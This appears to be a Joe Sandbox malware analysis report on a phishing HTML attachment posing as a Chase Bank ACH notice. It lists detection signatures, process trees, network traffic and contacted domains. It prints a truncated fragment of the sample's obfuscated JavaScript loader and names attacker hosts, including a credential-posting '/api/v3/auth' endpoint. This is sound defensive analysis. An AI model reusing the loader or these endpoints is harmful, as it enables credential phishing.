Edit tour

Windows Analysis Report
Housecallpro Chase Bank ACH.htm

Overview

General Information

Sample name:	Housecallpro Chase Bank ACH.htm
Analysis ID:	1432231
MD5:	8985f94e78f090fd084e6f98936426c0
SHA1:	c95eaaf6d497305d62a0ef7c615774060a638b0d
SHA256:	b50a71b811cf5218aa2746a56d1327b00d8a41bc01dc99711caada0ff912f613
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Detected javascript redirector / loader

HTML Script injector detected

HTML sample is only containing javascript code

HTML page contains hidden URLs or javascript code

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Housecallpro Chase Bank ACH.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2036,i,10491020609356299719,17026791416098519770,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,14694226768755553256,8904102379768142272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Phishing site detected (based on favicon image match)

Source: file://	Matcher: Template: microsoft matched with high similarity
Source: file:///C:/Users/user/Desktop/Housecallpro%20Chase%20Bank%20ACH.htm	Matcher: Template: microsoft matched with high similarity

Detected javascript redirector / loader

Source: Housecallpro Chase Bank ACH.htm

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Housecallpro%20Chase%20Bank%20ACH.htm	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Housecallpro%20Chase%20Bank%20ACH.htm	HTTP Parser: New script tag found

HTML sample is only containing javascript code

Source: Housecallpro Chase Bank ACH.htm

HTTP Parser: <script>const a0Z=a0E;function a0E(N,E){const R=a0N();return a0E=function(S,g){S=S-0x194;let s=R[S];return s;},a0E(N,E);}function a0N(){const p=['40MbgQOl','10044teFiWM','ipt','ite','scr','\x20src=\x22','1444098TTjNnq','888QIPOWD','value3','69076Egij...

Source: Housecallpro Chase Bank ACH.htm

HTTP Parser: Base64 decoded: https://bc1q2a2

Source: file:///C:/Users/user/Desktop/Housecallpro%20Chase%20Bank%20ACH.htm

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49764 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 152.199.4.44 152.199.4.44
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 185.216.70.216 185.216.70.216

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 23.45.182.85
Source: unknown	TCP traffic detected without corresponding DNS query: 23.45.182.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 208.111.136.128
Source: unknown	TCP traffic detected without corresponding DNS query: 208.111.136.128
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	HTTP traffic detected: GET /lnk/cloud.js HTTP/1.1Host: bc1q2a22gd79umarrlvhudct2v5.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /api/v3/auth HTTP/1.1Host: bc1qusz5l7h87pd2v6sv45nz82s.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=owbwle7rzO8EAgc&MD=rXp+yGxZ HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=owbwle7rzO8EAgc&MD=rXp+yGxZ HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: bc1q2a22gd79umarrlvhudct2v5.com
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: bc1qusz5l7h87pd2v6sv45nz82s.com

Source: unknown

HTTP traffic detected: POST /api/v3/auth HTTP/1.1Host: bc1qusz5l7h87pd2v6sv45nz82s.comConnection: keep-aliveContent-Length: 183sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7SUc.woff2)
Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7.woff2)
Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1pL7SUc.woff2)
Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa25L7SUc.woff2)
Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7SUc.woff2)
Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7SUc.woff2)
Source: chromecache_75.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2pL7SUc.woff2)

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49764 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.winHTM@37/10@18/9

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Housecallpro Chase Bank ACH.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2036,i,10491020609356299719,17026791416098519770,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,14694226768755553256,8904102379768142272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2036,i,10491020609356299719,17026791416098519770,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,14694226768755553256,8904102379768142272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
bc1q2a22gd79umarrlvhudct2v5.com	2%	Virustotal	Browse
cs1100.wpc.omegacdn.net	0%	Virustotal	Browse
aadcdn.msftauth.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico	0%	URL Reputation	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico	0%	URL Reputation	safe
file:///C:/Users/user/Desktop/Housecallpro%20Chase%20Bank%20ACH.htm	0%	Avira URL Cloud	safe
https://bc1q2a22gd79umarrlvhudct2v5.com/lnk/cloud.js	0%	Avira URL Cloud	safe
https://bc1qusz5l7h87pd2v6sv45nz82s.com/api/v3/auth	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bc1q2a22gd79umarrlvhudct2v5.com	185.216.70.216	true	false	2%, Virustotal, Browse	unknown
google.com	192.178.50.46	true	false		high
bc1qusz5l7h87pd2v6sv45nz82s.com	185.216.70.6	true	false		unknown
cs1100.wpc.omegacdn.net	152.199.4.44	true	false	0%, Virustotal, Browse	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false		high
www.google.com	142.250.217.196	true	false		high
aadcdn.msftauth.net	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bc1q2a22gd79umarrlvhudct2v5.com/lnk/cloud.js	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico	false	URL Reputation: safe URL Reputation: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js	false		high
https://bc1qusz5l7h87pd2v6sv45nz82s.com/api/v3/auth	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Housecallpro%20Chase%20Bank%20ACH.htm	true	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
185.216.70.6	bc1qusz5l7h87pd2v6sv45nz82s.com	Germany	43659	CLOUDCOMPUTINGDE	false
152.199.4.44	cs1100.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
142.250.217.196	www.google.com	United States	15169	GOOGLEUS	false
142.250.64.196	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.216.70.216	bc1q2a22gd79umarrlvhudct2v5.com	Germany	43659	CLOUDCOMPUTINGDE	false

Private

IP
192.168.2.17
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432231
Start date and time:	2024-04-26 17:59:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Housecallpro Chase Bank ACH.htm
Detection:	MAL
Classification:	mal60.phis.winHTM@37/10@18/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.178.50.67, 142.250.217.238, 108.177.12.84, 34.104.35.123, 142.250.217.234, 142.250.217.195, 142.250.64.138, 192.178.50.74, 142.250.64.202, 172.217.3.74, 142.250.217.202, 192.178.50.42, 142.250.189.138, 172.217.15.202, 172.217.165.202, 142.250.217.170, 142.250.64.234, 23.55.103.43, 192.229.211.108, 172.217.165.195, 192.178.50.46
Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.24.14	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
104.17.24.14	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
185.216.70.6	Chase Bank ACH.htm	Get hash	malicious	Unknown	Browse
	EncryptedPaymentAdviceReference.html	Get hash	malicious	Unknown	Browse
	Lettre_virement29638.htm	Get hash	malicious	Unknown	Browse
